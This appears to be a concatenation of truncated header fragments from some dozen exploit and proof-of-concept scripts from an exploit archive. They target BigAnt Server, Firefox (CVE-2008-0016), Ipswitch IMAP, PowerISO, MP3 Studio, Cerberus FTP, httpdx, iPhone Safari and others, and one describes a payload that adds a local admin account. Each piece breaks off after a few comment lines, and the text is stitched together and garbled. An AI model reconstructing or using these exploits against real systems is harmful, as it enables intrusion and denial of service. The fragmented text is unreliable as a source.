##################################################################################### Application: Novell Groupwise Client Platforms: Windows XP Professional French SP2 and SP3 crash: IE 6.0.2900.2180 Exploitation: remote DoS Date: 2009-0
#!/usr/bin/python # BigAnt Server version 2.50 SEH Overwrite - 0day # Written and discovered by Blake # Tested on Windows XP SP3 # # $ ./bigant.py 6660 # # [*] BigAnt Server v2.50 SEH Overwrite 0day # [*] Written and discovered by Blak
#!/usr/bin/env python #################################################################################### # # Poweriso 4.0 Local Buffer Overflow PoC # Found By:Dr_IDE # Tested On:XPSP3 # Usage:Create New ISO, Add a New Folder, Paste to Rename Folde
/* vulnerab : Remote Denial of Service Command vulnerab : User Software : Cerberus FTP Server Versian : 3.0.3 website software : http://www.cerberusftp.com greetz : *Str0ke* Milw0rm is The best in world */ #include stdio.h #include string.h #include
# Apple Safari Iphone Crash using tel: # Found by cloud : cloud[at]madpowah[dot]org # http://blog.madpowah.org # Tested on Iphone 3G, OS 3.0.1 # Launch Safari, enter the page and after a few seconds Safari will crash and black screen will appear # E
#!/usr/bin/python # FireFox Windows XP SP3 x86 Remote Exploit # Author: Dominic Chell dmc@deadbeef.co.uk # # Exploits the UTF-8 URL overflow vulnerability described in CVE-2008-0016. # As of September 2009 there are no public exploits for t
/* Ipsbitch.cpp vs Ipswitch IMAP * Tested on: Windows 2000 SP4 * Ref: CVE-2007-2795 * * Author: Dominic Chell dmc@deadbeef.co.uk * Found this half written on a VM so decided to finish it. * * Payload adds a local admin account USER=r00t PASS=r00tr00
/* mplode.c vs MP3 Studio v1.0 * Tested on: Windows 2000 SP4 * * Author: Dominic Chell dmc@deadbeef.co.uk * * PoC: http://www.milw0rm.com/exploits/9277 * The PoC author said he could not exploit it so I decided to try. * * A bit of fun for a boring
#!/usr/bin/perl -w #By ThE g0bL!N #Download : http://www.softpedia.com/get/Internet/Servers/WEB-Servers/Techlogica-HTTP-Server.shtml #Happy Ramadan And Happy eid use LWP::Simple; use LWP::UserAgent; print tTechlogica HTTP Server 1.03 Arbitrary File
/********************************************************************* Portable E.M Magic Morph 1.95b .MOR File Stack Buffer Overflow POC * By fl0 fl0w * can't stop me/my time is now/your time is up/MY TIME IS NOW !!!! * ****************************
# httpdx Web Server 1.4 'Host Header' Remote Format String Denial of Service PoC # # Coded by Pankaj Kohli # http://www.pank4j.com # # httpdx web server 1.4 is vulnerable to a remote format string vulnerability through the Host header. # The vulnera